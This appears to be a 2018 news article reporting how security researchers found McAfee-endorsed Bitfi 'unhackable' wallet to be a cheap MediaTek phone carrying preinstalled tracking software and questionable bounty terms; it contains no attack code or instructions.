Security Researchers Break Down McAfee-Endorsed Cryptocurrency Wallet, Find Nothing but a Cheap Smartphone
The world’s first “unhackable” cryptocurrency wallet, as claimed by John McAfee, faced the wrath of security researchers soon after its announcement on July 28, 2018.
Not so Unhackable
Cybersecurity blogger Ryan Castellucci first called out Bitfi’s supposed security features on his blog, breaking down several aspects that struck experts as suspicious. Post Castelluci’s coverage, researchers stated their findings and opinions over Twitter and Reddit.
For the uninitiated, McAfee advertised the Bitfi wallet on July 24, 2018, via Twitter, offering a bounty of $100,000 to anyone who can hack the “unhackable wallet.” Bitfi further claimed the amount was not a mere gimmick, priding on their “absolute security.”
However, Castellucci and others found out the wallet lacks sophisticated security software and closely resembled an entirely different device, calling it a “cheap stripped down Android phone” based on released photos.
Don’t trust the new BitFi hardware wallet. pic.twitter.com/ywFG8pS0Ms
— Whalepool (@whalepool) July 28, 2018
Researchers have compiled a substantial list of directories, available for public viewing on Pastebin, which load on the device’s RAM during startup. This step gives them an overview of all processes pre-installed on the Bitfi wallet.
While investigations revealed the lack of internal cold storage, researchers were most startled by the presence of a malware application called Adups FOTA, which infamously relays sensitive user data, such as calls, texts, and location, to its servers in China after a recurring period of 72 hours.
Tracking Device or Storage Device?
Bitfi additionally features a pre-installed version of Baidu, a Chinese application with inbuilt GPS tracking functionality. Alarmingly, both applications in question seemed to be transmitting data to Chinese servers during tests.
Update on the BitFi device so far
Most of the firmware looks just like a normal MTK phone, including:
– A Baidu GPS/WIFI tracker
– The well-known Adups FOTA malware suite
– The entire Mediatek library of example apps
– A tracker, capable of logging all activity on the device
— OverSoft (@OverSoftNL) July 30, 2018
Interestingly, the bounty comes with its own set of terms and conditions. Researchers have first to purchase a $120 Bitfi device, pay $10 to load it with coins, and then hack their own device. Castellucci added:
“A researcher found, for example, [if] the device had a weak RNG that allowed for key recovery by examining a series of transactions generated by it, they would not win the bounty. Neither would they for finding a way to hijack their automatic update system to install a keylogger.”
Other security researchers shared their findings on Twitter:
So now we have pictures of the bare @Bitfi6 board.
It's just a MEDIATEK MT6580.
No sign of a secure element.
— Ask Cybergibbons! (@cybergibbons) July 29, 2018
From what it seems, Bitfi has purchased cheap mobile phones in bulk and shipped them on the pretext of a cryptocurrency wallet, with no regard for data privacy or the potential loss of funds.
Meanwhile, McAfee confirmed the absence of internal storage on the Bitfi device on Twitter, stated the wallet receives instructions “for each coin from our servers.” This aspect makes the product nothing more than an online wallet offering with a dedicated device for accessibility.